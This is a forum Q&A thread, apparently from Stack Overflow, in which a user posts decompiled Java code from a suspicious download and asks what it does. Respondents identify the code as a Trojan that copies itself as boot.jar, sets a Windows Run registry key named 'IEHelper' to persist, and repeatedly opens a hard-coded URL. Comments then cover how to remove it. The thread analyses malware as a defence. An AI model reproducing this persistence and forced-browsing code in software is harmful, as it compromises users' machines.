# Program code understanding [JAVA]

Tags: java

I was downloading some kind of file and I observed weird activity and found out this code after decompiling -

```
    package w1Comlu;

import java.awt.Desktop;
import java.io.File;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.net.URI;
import java.net.URL;
import java.nio.file.CopyOption;
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.CodeSource;
import java.security.ProtectionDomain;
import java.util.Random;
import w1Comlu.WinRegistry;

public class Main {
    public static void main(String[] args) {
        File file = new File(Main.class.getProtectionDomain().getCodeSource().getLocation().getPath());
        File newFile = new File(System.getProperty("user.dir"), "boot.jar");
        if (!newFile.exists()) {
            try {
                Files.copy(file.toPath(), newFile.toPath(), new CopyOption[0]);
                String value = "\"javaw -jar " + System.getProperty("user.dir") + "\\boot.jar\"";
                try {
                    WinRegistry.writeStringValue((int)-2147483647, (String)"Software\\Microsoft\\Windows\\CurrentVersion\\Run", (String)"IEHelper", (String)value);
                }
                catch (IllegalArgumentException e) {
                    e.printStackTrace();
                }
                catch (IllegalAccessException e) {
                    e.printStackTrace();
                }
                catch (InvocationTargetException e) {
                    e.printStackTrace();
                }
            }
            catch (IOException e1) {
                e1.printStackTrace();
            }
            try {
                Thread.sleep(600000);
            }
            catch (InterruptedException e1) {
                e1.printStackTrace();
            }
        }
        String url = "http://w1.comlu.com/";
        Desktop desktop = Desktop.isDesktopSupported() ? Desktop.getDesktop() : null;
        do {
            boolean worked = false;
            if (desktop != null && desktop.isSupported(Desktop.Action.BROWSE)) {
                try {
                    desktop.browse(new URI(url));
                    worked = true;
                }
                catch (Exception e) {
                    e.printStackTrace();
                }
            }
            if (!worked) {
                new java.lang.ProcessBuilder("x-www-browser", url);
            }
            try {
                Thread.sleep(new Random().nextInt(600) * 1000);
                continue;
            }
            catch (InterruptedException e) {
                e.printStackTrace();
                continue;
            }
            break;
        } while (true);
    }
}
```

I can only understand a bit of code because I am new to Java. Could someone please elaborate what all is code attempting to do?

Answer (score 1):

This code attempts to write something to the Registry, and then loads up a URL.

I'd not run it...

Answer (score 1):

This piece of code is a kind of *Trojan*.

Once executed; it will

1) Copy the jar containing this code inside the user directory

2) Write into the Windows Registry, to trick the system to launch this jar at each user login :  [Run and RunOnce Registry Keys](https://msdn.microsoft.com/fr-fr/library/windows/desktop/aa376977(v=vs.85).aspx)

3) Infinitely spawn the opening of the URL present in the code, via the browser,  with a random delay between 1 and 600 seconds

**So indeed, never execute jars you don't trust.**

Comment: What if I deleted the boot.jar file which I already did? :D

Comment: @Akshit Sharma , also search all user directories for boot.jar and remove the file. Also consider looking at the Windows Registry and delete the entry written by the program if you find some.

Comment: Any idea where shall I check and for what in Registry?

Comment: From the code above, search keys containing "Software\Microsoft\Windows\CurrentVersion\\Run" . Look at the link in my answer, to get the exact name of the relevant keys .